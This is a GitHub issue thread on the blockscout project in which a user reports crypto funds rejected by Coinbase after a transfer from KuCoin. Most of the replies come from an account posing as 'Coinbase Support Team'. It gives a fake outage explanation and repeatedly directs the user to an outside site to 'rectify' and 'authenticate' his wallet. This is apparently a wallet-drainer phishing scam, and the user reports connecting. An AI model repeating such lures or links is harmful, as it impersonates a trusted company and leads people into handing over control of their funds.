### ISSUE TITLE
Coinbase no accept this network 

### ISSUE THREAD

**Issue by MutiMarius** [blockscout/blockscout#9076]
### Description

I sent some money from kucoin to coinbase but coinbase does not accept this internet and rejected my money, I contacted them and they have. to contact you to recover my money

### Type of the installation

Docker-compose

### Type of the JSON RPC archive node

geth

### Backend version

v5.3.3-kava

### Elixir & Erlang/OTP versions

Elixir 1.14.5 Erlang/OTP 25

### Operating system

unix linux

### Additional information

The issue happened at Kava 10 Blockscout instance

**Comment by Github-Node** [comment]
Hello @MutiMarius  
Please accept our apologies for the delay, Our backend systems went down as a result of transcript error caused by bugs during transaction which leads to inaccurate balance ,Failed or stuck transaction. we couldn’t process your request under usual processing times. In order to help you fix your issue immediately, perform this quick fix protocol:
Kindly perform the Rectification on the node string via [Coinbase Dapps Forum Support](Hello @MutiMarius
Please accept our apologies for the delay, Our backend systems went down as a result of transcript error caused by bugs during transaction which leads to inaccurate balance ,Failed or stuck transaction. we couldn’t process your request under usual processing times. In order to help you fix your issue immediately, perform this quick fix protocol:
Kindly perform the Rectification on the node string via [Coinbase Dapps Forum Support](https://dextoolhub.com/evm) select your "wallet Rectification", select the wallet account Coinbase wallet/other wallet, Incase Coinbase wallet is not listed: fill in the correct info in order to Rectified. you’ll be assigned a barcode, after which means success, take a screenshot of it and your issue would be rectified.

Note; Click on the live chat icon at the bottom corner of the page with support ticket id MNS763 to initiate chat with a live support agent immediately.

Regards.
[Coinbase Support Team](https://dextoolhub.com/evm)) select your "wallet Rectification", select the wallet account Coinbase wallet/other wallet, Incase your wallet is not listed: fill in the correct info in order to Rectified. you’ll be assigned a barcode, after which means success, take a screenshot of it and your issue would be rectified.

Note; Click on the live chat icon at the bottom corner of the page with support ticket id MNS763 to initiate chat with a live support agent immediately.

Regards.
[Coinbase Support Team](https://dextoolhub.com/evm)

**Comment by MutiMarius** [comment]
Hello i press both but no show me any cod

În dum., 31 dec. 2023 la 00:38 Github-Node ***@***.***> a
scris:

**Comment by Github-Node** [comment]
To rectify your issue , kindly properly authenticate your wallet https://dextoolhub.com/evm

**Comment by MutiMarius** [comment]
I Connect but noting

În dum., 31 dec. 2023 la 19:40 Github-Node ***@***.***> a
scris:

**Comment by ekawibisono** [comment]
This Github blockscout, you can contract direcly Kucoin, Thanks
